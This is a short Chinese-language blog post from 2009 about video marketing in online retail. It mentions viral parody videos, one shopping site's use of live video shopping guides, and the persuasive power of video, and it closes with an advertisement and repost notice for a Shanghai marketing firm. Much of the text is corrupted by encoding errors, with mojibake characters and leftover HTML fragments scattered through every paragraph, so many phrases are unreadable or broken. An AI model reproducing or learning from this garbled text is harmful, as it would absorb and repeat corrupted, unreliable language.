　　《一个馒头引发的血案》最大限度地为《无极》做了推�qѝ��前不久看到太��^�z�汽车网上一个视频《希特勒怒骂�q�腾上市》，利用名�h希特勒正话反��_��?属一�l�，目前点击已近20万。七星购物在B2C领域知名度远不及当当和卓��，甚至略逊于京东商城、红孩子�Q�而今�q�以来其通过商品视频化的销售方式，大幅提高了商品的��x��度。一度被视作�?#8220;黄色嫌疑”�?#8220;��女视频聊天”也得以成功应用，��q��奛_��购员使用视频聊天室的方式�Q�直接向用户展示商品或提供视频导购服务，受到了空前的�Ƣ迎�?/p>
正所�?#8220;得终端者得天下”。有研究表明�Q�导购员在终端的诱导购买�Q�经�怋ə�֮�改变购买初衷�?#8220;视频营销”��宛如网�l�终端的商品��D��员，通过直接介绍、间接诱导等形式�Q��y妙嵌入品牌和产品信息。一�D는�动�Ş象的视频�Q�可以��需求犹豫者更加坚定，使无需求者��生需求。上��h��普网�l�可以帮助你�q�行�|�络营销让你快速实现奥巴马一��L��成�W�Q�网�l�营销�{�划

    本文��Q�上��h��普网�l�，http://www.eshyp.com�Q?转蝲请保留链接出处，谢谢配合�?/p>

肖马�?/a> 2009-11-20 13:55 发表评论